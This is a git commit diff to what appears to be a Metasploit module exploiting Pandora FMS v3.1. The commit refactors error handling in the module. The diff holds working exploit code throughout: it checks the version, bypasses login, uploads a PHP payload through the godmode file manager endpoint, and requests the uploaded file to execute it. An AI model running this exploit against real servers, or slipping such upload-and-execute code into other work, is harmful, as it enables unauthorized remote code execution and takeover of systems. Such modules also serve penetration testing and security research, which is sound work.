Applied changes recommended by jlee-r7

rcnunez · rcnunez · commit b3def856fdd1 · 2015-01-07T18:38:19.000+08:00
used Rex::ConnectionError refactor begin/rescue blocks removed ::URI::InvalidURIError changed @peer with peer used Exploit::CheckCode:Appears instead of Exploit::CheckCode::Vulnerable
diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb
@@ -69,7 +69,7 @@ def check
       if res and res.code == 200
         #Tested on v3.1 Build PC100609 and PC100608
         if res.body.include?("v3.1 Build PC10060")
-          return Exploit::CheckCode::Vulnerable
+          return Exploit::CheckCode::Appears
         elsif res.body.include?("Pandora")
           return Exploit::CheckCode::Detected
         end
@@ -84,35 +84,28 @@ def check
 
   # upload a payload using the pandora built-in file upload
   def upload(base, file, cookies)
+    data = Rex::MIME::Message.new
+    data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
+    data.add_part("Go", nil, nil, 'form-data; name="go"')
+    data.add_part("images", nil, nil, 'form-data; name="directory"')
+    data.add_part("1", nil, nil, 'form-data; name="upload_file"')
+    data_post = data.to_s
+    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    begin
-      data = Rex::MIME::Message.new
-      data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
-      data.add_part("Go", nil, nil, 'form-data; name="go"')
-      data.add_part("images", nil, nil, 'form-data; name="directory"')
-      data.add_part("1", nil, nil, 'form-data; name="upload_file"')
-      data_post = data.to_s
-      data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
-
-      res = send_request_cgi({
-        'method'  => 'POST',
-        'uri'     => normalize_uri(base, 'index.php'),
-        'cookie'  => cookies,
-        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
-        'vars_get' => {
-          'sec'  => 'gsetup',
-          'sec2' => 'godmode/setup/file_manager',
-        },
-        'data'    => data_post
-      })
-
-      register_files_for_cleanup(@fname)
-      return res
-
-    rescue ::URI::InvalidURIError
-      fail_with(Exploit::Failure::Unknown, "Unable to get the uri correctly")
-    end
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(base, 'index.php'),
+      'cookie'  => cookies,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'vars_get' => {
+        'sec'  => 'gsetup',
+        'sec2' => 'godmode/setup/file_manager',
+      },
+      'data'    => data_post
+    })
 
+    register_files_for_cleanup(@fname)
+    return res
   end
 
   def exploit
@@ -140,33 +133,34 @@ def exploit
           print_status("Login Bypass Successful")
           print_status("cookie monster = " + cookies)
       else
-          print_error("Login Bypass Failed")
+          fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
       end
     end
 
     # upload PHP payload to images/[fname]
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
     php    = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, php, cookies)
-      if res and res.code == 200
-        print_good("#{@peer} - File uploaded successfully")
-      else
-        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
-      end
     rescue ::Rex::ConnectionError
-      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    if res and res.code == 200
+      print_good("#{peer} - File uploaded successfully")
+    else
+      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (images/#{@fname})")
+    print_status("#{peer} - Executing payload (images/#{@fname})")
     begin
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, 'images', "#{@fname}")
       })
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+    rescue ::Rex::ConnectionError
+      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end
